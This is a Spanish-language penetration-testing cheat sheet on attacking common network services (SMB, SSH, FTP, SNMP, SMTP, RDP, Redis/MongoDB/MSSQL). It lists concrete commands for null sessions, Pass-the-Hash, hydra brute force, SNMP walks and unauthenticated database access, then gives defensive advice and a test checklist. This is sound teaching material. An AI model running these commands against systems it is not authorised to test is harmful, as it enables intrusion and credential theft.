Ataques a protocolos de servicio
Cada servicio de red (SMB, SSH, FTP, SNMP, SMTP, RDP, bases de datos) tiene sus propias debilidades, configuraciones inseguras y técnicas de ataque. Esta ficha recorre los servicios más comunes que te encontrarás tras la enumeración (ver Enumeración de servicios de red) y qué atacar en cada uno: credenciales por defecto, acceso anónimo, versiones vulnerables y protocolos inseguros por diseño.
SMB (139/445) — el más explotado en redes Windows
Sección titulada «SMB (139/445) — el más explotado en redes Windows»# enumeración y accesonxc smb host -u '' -p '' --shares --users # null sessionsmbclient //host/share -N # conexión anónima# ataquesnxc smb host -u user -H <NThash> # Pass-the-Hash (ver ad-lateral)# CVEs históricos: EternalBlue (MS17-010), SMBGhost (CVE-2020-0796)nmap --script=smb-vuln-ms17-010 -p445 hostSMB es la puerta al dominio: shares con credenciales, PtH, relay (ver NTLM Relay).
SSH (22)
Sección titulada «SSH (22)»# enumeraciónssh-audit host ; nmap --script=ssh-auth-methods host# ataqueshydra -L users.txt -P pass.txt ssh://host # fuerza bruta (cuidado con lockout)# claves privadas robadas, authorized_keys, agent hijacking# CVEs: según versión (libssh auth bypass CVE-2018-10933, etc.)FTP (21)
Sección titulada «FTP (21)»# acceso anónimo (muy común)ftp host -> anonymous / anonymousnmap --script=ftp-anon -p21 host# ataques: credenciales débiles, subida de webshell si FTP->webroot, FTP bounceSNMP (161/UDP) — mina de información
Sección titulada «SNMP (161/UDP) — mina de información»# community strings (public = solo lectura, private = escritura)onesixtyone -c communities.txt hostsnmpwalk -v2c -c public host # volcar toda la MIBsnmpbulkwalk -v2c -c public host # más rápido# revela: procesos, usuarios, software, interfaces, rutas, a veces credencialesSNMP v1/v2c no cifra y usa community strings triviales: oro para recon interno.
SMTP (25)
Sección titulada «SMTP (25)»# enumeración de usuariossmtp-user-enum -M VRFY -U users.txt -t host# open relay (enviar correo como cualquiera -> phishing)nmap --script=smtp-open-relay -p25 hostRDP (3389)
Sección titulada «RDP (3389)»nmap --script=rdp-ntlm-info,rdp-enum-encryption -p3389 host# BlueKeep (CVE-2019-0708): RCE preauth en versiones viejas# ataques: fuerza bruta (crowbar/hydra), PtH con Restricted Admin (ver ad-lateral)xfreerdp /v:host /u:user /pth:<NThash>Bases de datos (1433 MSSQL, 3306 MySQL, 5432 PostgreSQL, 27017 Mongo, 6379 Redis)
Sección titulada «Bases de datos (1433 MSSQL, 3306 MySQL, 5432 PostgreSQL, 27017 Mongo, 6379 Redis)»# credenciales por defecto / sin authmysql -h host -u root # sin contraseña (común en labs/dev)redis-cli -h host # Redis sin auth -> escritura de ficheros/SSH keymongo host # MongoDB sin auth -> volcado total# MSSQL: xp_cmdshell, linked servers (ver ad-mssql)mssqlclient.py user:pass@host -windows-authRedis y MongoDB sin autenticación expuestos a Internet son hallazgos críticos frecuentes.
Telnet (23), rlogin, servicios en claro
Sección titulada «Telnet (23), rlogin, servicios en claro»Protocolos legacy sin cifrado: credenciales viajan en texto plano → captura por sniffing (ver Sniffing de red). Su mera presencia ya es un hallazgo.
Para la defensa
Sección titulada «Para la defensa»Principios transversales: cambiar credenciales por defecto, deshabilitar acceso anónimo y protocolos legacy sin cifrar (Telnet, FTP, SNMPv1/2c → usar SSH/FTPS/SNMPv3), parchear versiones vulnerables (EternalBlue, BlueKeep), no exponer bases de datos a Internet, autenticación fuerte + MFA donde aplique, y segmentación. Monitorizar fuerza bruta (muchos fallos de login).
Checklist de prueba
Sección titulada «Checklist de prueba»- SMB: null session, shares, PtH, ms17-010
- SSH: métodos de auth, versión, fuerza bruta controlada
- FTP: acceso anónimo, credenciales débiles
- SNMP: community strings y walk de la MIB
- SMTP: enumeración de usuarios y open relay
- RDP: info NTLM, BlueKeep, PtH
- Bases de datos: sin auth / credenciales por defecto (Redis/Mongo/MySQL)
- Protocolos en claro (Telnet) para captura por sniffing